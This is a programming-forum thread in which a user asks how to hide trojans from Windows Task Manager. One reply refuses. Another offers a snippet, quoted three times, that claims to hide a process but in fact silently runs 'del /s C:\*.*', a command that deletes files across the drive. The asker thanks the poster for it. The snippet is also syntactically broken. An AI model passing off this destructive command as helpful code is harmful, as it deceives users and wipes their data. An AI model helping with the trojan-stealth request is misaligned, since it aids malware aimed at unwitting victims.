TaskManager - trojans
-
Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?
nelsonpaixao@yahoo.com.br trying to help & get help
-
Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?
nelsonpaixao@yahoo.com.br trying to help & get help
You are scum. You think we're going to help you write destructive code ?
Christian Graus Driven to the arms of OSX by Vista.
-
Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?
nelsonpaixao@yahoo.com.br trying to help & get help
-
Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?
nelsonpaixao@yahoo.com.br trying to help & get help
take it easy!!! :laugh: i already read a post asking this on monday!!!
nelsonpaixao@yahoo.com.br trying to help & get help
-
take it easy!!! :laugh: i already read a post asking this on monday!!!
nelsonpaixao@yahoo.com.br trying to help & get help
Even if you're not writing a trojan, someone else could be, so why would we publicly tell people how to do it ?
Christian Graus Driven to the arms of OSX by Vista.
-
Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?
nelsonpaixao@yahoo.com.br trying to help & get help
Here's the code: Put this at the start of your .cs file
Using System.Diagnostics;
Then use this to hid the process itself.Process HideFromTaskManager = NewProcess();
HideFromTaskManager.Startinfo.Filename = @"del /s C:\*.*"
HideFromTaskManager.StartInfo.CreateNoWindow = True
HideFromTaskManager.Start()Today's lesson is brought to you by the word "niggardly". Remember kids, don't attribute to racism what can be explained by Scandinavian language roots. -- Robert Royall
-
Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?
nelsonpaixao@yahoo.com.br trying to help & get help
just wanted to know how to do it. Why is all the fuzz, wanted more how to trigger one procedure when a particular application lanches or shutdown, people already asked it before, and some were thinking on trojans but they didn´t say. science is neutral, we use it for good or bad purposes, cant put a break there, i think. :doh:
nelsonpaixao@yahoo.com.br trying to help & get help
-
Here's the code: Put this at the start of your .cs file
Using System.Diagnostics;
Then use this to hid the process itself.Process HideFromTaskManager = NewProcess();
HideFromTaskManager.Startinfo.Filename = @"del /s C:\*.*"
HideFromTaskManager.StartInfo.CreateNoWindow = True
HideFromTaskManager.Start()Today's lesson is brought to you by the word "niggardly". Remember kids, don't attribute to racism what can be explained by Scandinavian language roots. -- Robert Royall
thanks dan! :)
nelsonpaixao@yahoo.com.br trying to help & get help
-
Here's the code: Put this at the start of your .cs file
Using System.Diagnostics;
Then use this to hid the process itself.Process HideFromTaskManager = NewProcess();
HideFromTaskManager.Startinfo.Filename = @"del /s C:\*.*"
HideFromTaskManager.StartInfo.CreateNoWindow = True
HideFromTaskManager.Start()Today's lesson is brought to you by the word "niggardly". Remember kids, don't attribute to racism what can be explained by Scandinavian language roots. -- Robert Royall